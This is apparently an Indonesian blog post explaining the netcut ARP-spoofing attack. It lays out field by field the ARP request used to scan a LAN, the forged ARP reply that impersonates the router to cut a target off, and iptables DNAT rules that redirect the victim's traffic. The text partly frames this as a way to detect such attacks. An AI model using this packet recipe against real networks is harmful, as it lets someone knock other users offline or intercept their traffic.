Algoritma/Alur kerja netcut - RedFoX
Buat yang pengen tahu Cara Kerjanya dan buat yang mau bikin tool netcut dan agar bisa mengantisipasi jika kalian terkena serangan dari netcut :D
Kalau kita ingin tau apakah kita terkena serangan netcut, gunakan arpmon.py (monitoring paket ARP) dan lihat apakah ada paket ARP yang mencurigakan. Lihat pada bagian [TO CUT OTHER USER] dan lihat apakah ada ARP paket yang mencurigakan/ARP paket yang bentuknya sama seperti di [TO CUT OTHER USER].
NETCUT Algorithm:
Scan MAC address (arp request) -> add iptables rules -> (send arp reply packet -> repeat)
[TO SCAN MAC ADDRESS]:
ARP PACKET
****************_ETHERNET_FRAME_****************
Dest/Broadcast MAC: ffffffffffff #Router MAC Address/Broadcast MAC Address
Source MAC: 00082252bdff #Your MAC Address
Type: 0806
************************************************
******************_ARP_HEADER_******************
Hardware type: 0001
Protocol type: 0800
Hardware size: 06
Protocol size: 04
Opcode: 0001 #OPCODE to request
Source MAC: 00082252bdff #Your MAC Address
Source IP: 192.168.1.2 #Your IP Address
Dest MAC: 000000000000 #Local MAC Address
Dest IP: 192.168.1.x #IP Address to get MAC Address # x = 0-256
*************************************************
****************_ETHERNET_FRAME_****************
Dest/Broadcast MAC: ffffffffffff #Router MAC Address/Broadcast MAC Address
Source MAC: 00082252bdff #Your MAC Address
Type: 0806
************************************************
******************_ARP_HEADER_******************
Hardware type: 0001
Protocol type: 0800
Hardware size: 06
Protocol size: 04
Opcode: 0001 #OPCODE to request
Source MAC: 00082252bdff #Your MAC Address
Source IP: 192.168.1.2 #Your IP Address
Dest MAC: 000000000000 #Local MAC Address
Dest IP: 192.168.1.x #IP Address to get MAC Address # x = 0-256
*************************************************
[TO CUT OTHER USER]:
ARP PACKET
****************_ETHERNET_FRAME_****************
Dest/Broadcast MAC: f40e22f67bdd #MAC Address Target
Source MAC: 000822f036b0 #Your MAC Address
Type: 0806
************************************************
******************_ARP_HEADER_******************
Hardware type: 0001
Protocol type: 0800
Hardware size: 06
Protocol size: 04
Opcode: 0002 #OPCODE to reply
Source MAC: 000822f036b0 #Your MAC Address
Source IP: 192.168.1.254 #IP address Router
Dest MAC: ffffffffffff #MAC Address Router/Broadcast MAC Address
Dest IP: 0.0.0.0 #Local IP Address
*************************************************
****************_ETHERNET_FRAME_****************
Dest/Broadcast MAC: f40e22f67bdd #MAC Address Target
Source MAC: 000822f036b0 #Your MAC Address
Type: 0806
************************************************
******************_ARP_HEADER_******************
Hardware type: 0001
Protocol type: 0800
Hardware size: 06
Protocol size: 04
Opcode: 0002 #OPCODE to reply
Source MAC: 000822f036b0 #Your MAC Address
Source IP: 192.168.1.254 #IP address Router
Dest MAC: ffffffffffff #MAC Address Router/Broadcast MAC Address
Dest IP: 0.0.0.0 #Local IP Address
*************************************************
[IPTABLES RULES TO REDIRECT TARGET]:
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
protoent* getprotobynumber(int)(3) is not implemented on Android
DNAT tcp -- anywhere anywhere to:127.0.0.100 #Target destination
target prot opt source destination
protoent* getprotobynumber(int)(3) is not implemented on Android
DNAT tcp -- anywhere anywhere to:127.0.0.100 #Target destination
Chain INPUT (policy ACCEPT)
target prot opt source destination
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
target prot opt source destination
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
MASQUERADE all -- anywhere anywhere
target prot opt source destination
MASQUERADE all -- anywhere anywhere
Chain natctrl_nat_POSTROUTING (0 references)
target prot opt source destination
target prot opt source destination
Chain oem_nat_pre (0 references)
target prot opt source destination
target prot opt source destination
EmoticonEmoticon